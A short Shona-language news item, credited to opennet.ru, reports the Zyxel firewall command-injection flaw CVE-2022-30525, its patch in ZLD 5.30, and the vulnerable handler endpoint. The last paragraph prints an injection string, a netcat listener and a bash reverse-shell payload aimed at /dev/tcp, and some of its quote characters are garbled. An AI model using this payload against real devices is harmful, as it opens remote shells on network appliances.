Kusagadzikana kwakanyanya (CVE-2022-30525) kwakaonekwa muZyxel zvishandiso zveATP, VPN uye USG FLEX nhepfenyuro, yakagadzirirwa kuronga mashandiro emadziro emoto, IDS uye VPN mumabhizinesi, izvo zvinobvumira anorwisa wekunze kuti aite kodhi pane mudziyo usina kodzero dzemushandisi pasina humbowo. Kuti aite kurwisa, munhu anorwisa anofanira kukwanisa kutumira zvikumbiro kumudziyo achishandisa HTTP/HTTPS protocol. Zyxel yakagadzirisa kusagadzikana muZLD 5.30 firmware update. Sekureva kweShodan sevhisi, parizvino kune 16213 zvishandiso zvingangove panjodzi pane yepasirese network inogamuchira zvikumbiro kuburikidza neHTTP/HTTPS.
Kushanda kunoitwa nekutumira mirairo yakanyatsogadzirwa kune web handler /ztp/cgi-bin/handler, inowanikwa pasina humbowo. Dambudziko rinokonzerwa nekushaikwa kwekucheneswa kwakaringana kwezviyero zvekukumbira paunenge uchiita mirairo pane sisitimu uchishandisa os.system call inoshandiswa muraibhurari yelib_wan_settings.py uye inoitwa paunenge uchigadzira iyo setWanPortSt oparesheni.
Semuenzaniso, munhu anorwisa anogona kupfuudza tambo β; ping 192.168.1.210;" izvo zvinozotungamira pakuitwa kwe "ping 192.168.1.210" kuraira pane system. Kuti uwane mukana kugomba rekuraira, unogona kumhanya "nc -lvnp 1270" pane yako system, uye wobva watanga reverse rekubatanidza nekutumira chikumbiro kune mudziyo neicho '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.
Source: opennet.ru